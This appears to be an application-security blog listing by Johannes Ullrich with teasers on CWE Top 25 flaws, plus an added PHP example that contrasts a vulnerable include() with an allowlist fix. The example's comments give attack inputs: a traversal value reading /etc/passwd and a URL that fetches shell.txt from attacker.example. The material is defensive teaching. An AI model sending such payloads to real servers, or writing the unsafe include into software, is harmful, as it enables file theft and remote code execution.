AppSec Blog: Author - Johannes Ullrich

Top 25 Series - Rank 13 - PHP File Inclusion

Last year, when we got going with our web honeypot, we quickly found that PHP file inclusion vulnerabilities were by far the #1 exploit the honeypot was exposed to [1]. In part, this may have been due to our heavily emulating PHP applications. But many of the exploits didn't match any of the installed …
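The pattern behind the exploits the honeypot kept seeing is an `include` whose path comes straight from the request. The snippet below is an added example, not code from the original post or from SANS: it pairs the vulnerable form with a hardened version that maps the untrusted parameter onto a fixed allowlist of templates. The `templates/` file names and the `page` parameter are assumptions for illustration.

```php
<?php
// Added example (not from the original post). Shows the classic PHP file
// inclusion bug and one straightforward fix.

// VULNERABLE: the request parameter is used as an include path.
//   ?page=../../../../etc/passwd          -> local file inclusion (file contents leak,
//                                            or code execution if the file holds PHP)
//   ?page=http://attacker.example/shell.txt -> remote file inclusion, if the
//                                            allow_url_include ini setting is On
function render_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: the parameter is never treated as a path. It is a key into an
// allowlist, and only the allowlist values (assumed template files) reach include().
const TEMPLATES = [
    'home'    => 'templates/home.php',
    'about'   => 'templates/about.php',
    'contact' => 'templates/contact.php',
];

function render_safe(string $page): void
{
    if (!array_key_exists($page, TEMPLATES)) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    // __DIR__ anchors the include to this script's directory, so even a
    // misconfigured include_path cannot redirect it elsewhere.
    include __DIR__ . '/' . TEMPLATES[$page];
}

$page = $_GET['page'] ?? 'home';
render_safe($page);
```

Two caveats a reviewer should keep in mind: `allow_url_include` has defaulted to Off since PHP 5.2, so remote inclusion usually needs a misconfiguration, but local file inclusion works regardless of that setting; and a blocklist of `..` or `http://` is not a substitute for the allowlist, because encodings, PHP stream wrappers (`php://filter`, `data:`) and other tricks routinely get around it.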


Top 25 Series - Rank 11 - Hardcoded Credentials

Talking about hard-coded credentials with other developers, one of the first questions to come up is "where else to keep them?". A hard-coded credential is usually a password used to obtain administrative access to software, or a password used by that same software to establish outbound connections, for example to connect to a …


Top 25 Series - Rank 7 - Path Traversal

In October 2001, when the DShield.org site was just about a year old, I was alerted to a flood of reports hitting the site. Looking at the reports in more detail, I found that most of them were due to blocked ICMP packets being reported to the site. Further investigation revealed that the reports were …


Top 25 Series - Rank 8 - Unrestricted Upload of Dangerous File Type

File uploads are a hard problem, and it is no surprise that they made it into the Top 25 list. We covered some of the tactical issues in allowing file uploads in an earlier blog post. This post discusses how to use the SDL (Security Development Lifecycle) to your advantage to avoid some of the risks.


More MiFi Fun. Consistent Authentication Matters!

The Novatel MiFi device is a rich target for simple web application exploitation. In this example, we show how to use a simple form and a single JavaScript command to turn the Verizon version of the device into an open access point.